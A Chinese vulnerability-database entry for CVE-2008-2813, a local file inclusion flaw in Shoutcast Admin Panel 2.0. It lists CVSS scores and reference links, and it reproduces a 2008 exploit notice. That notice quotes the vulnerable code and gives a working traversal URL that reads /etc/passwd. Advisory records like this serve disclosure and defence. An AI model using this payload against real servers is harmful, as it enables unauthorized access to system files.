CVE-2008-2813 |
|
发布时间 :2008-06-23 13:41:00 | ||
修订时间 :2008-09-05 00:00:00 | ||||
NMCOE |
[原文]Directory traversal vulnerability in index.php in WallCity-Server Shoutcast Admin Panel 2.0, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.
[CNNVD]WallCity-Server Shoutcast 控制面板 ‘index.php’ 目录遍历漏洞(CNNVD-200806-303)
WallCity-Server Shoutcast 控制面板 2.0的index.php中存在目录遍历漏洞, 在magic_quotes_gpc无效时, 远程攻击者可以通过页参数的一个'..'来包含和执行任意本地文件。
–
CVSS (基础分值)
CVSS分值: | 6.8 | [中等(MEDIUM)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | MEDIUM | [漏洞利用存在一定的访问条件] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-22 | [对路径名的限制不恰当(路径遍历)] |
–
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://xforce.iss.net/xforce/xfdb/43109 (UNKNOWN) XF shoutcast-index-file-include(43109) |
http://www.securityfocus.com/bid/29733 (UNKNOWN) BID 29733 |
http://www.milw0rm.com/exploits/5813 (UNKNOWN) MILW0RM 5813 |
http://secunia.com/advisories/30678 (VENDOR_ADVISORY) SECUNIA 30678 |
–
漏洞信息
WallCity-Server Shoutcast 控制面板 ‘index.php’ 目录遍历漏洞 | |
中危 | 路径遍历 |
2008-06-23 00:00:00 | 2008-09-05 00:00:00 |
远程 | |
WallCity-Server Shoutcast 控制面板 2.0的index.php中存在目录遍历漏洞, 在magic_quotes_gpc无效时, 远程攻击者可以通过页参数的一个'..'来包含和执行任意本地文件。 |
–
公告与补丁
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。 |
–
漏洞信息 (5813)
Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability (EDBID:5813) |
|
php | webapps |
2008-06-14 | Verified |
0 | CWH Underground |
N/A |
[点击下载] |
============================================================ Shoutcast Admin Panel 2.0 Local File Inclusion Vulnerability ============================================================ ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 14 June 2008 SITE : www.citec.us ##################################################### APPLICATION : WallCity-Server: Shoutcast Admin Panel VERSION : 2.0 DOWNLOAD : http://downloads.sourceforge.net/shoutcastadmin ##################################################### ---LFI--- ------------------------- Vulnerable in index.php ------------------------- @Line 79: if (isset($_GET['page'])) 80: $page = $_GET['page']; 81: else 82: $page = "main"; . . . 204: ------------- POC Exploit ------------- [+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00 ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-14]
–
漏洞信息
46152 |
|
SHOUTcast Admin Panel index.php page Parameter Traversal Local File Inclusion | |
Remote / Network Access |
Input Manipulation |
Loss of Integrity | |
Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
–
时间线
2008-06-14 |
Unknow |
2008-06-14 | Unknow |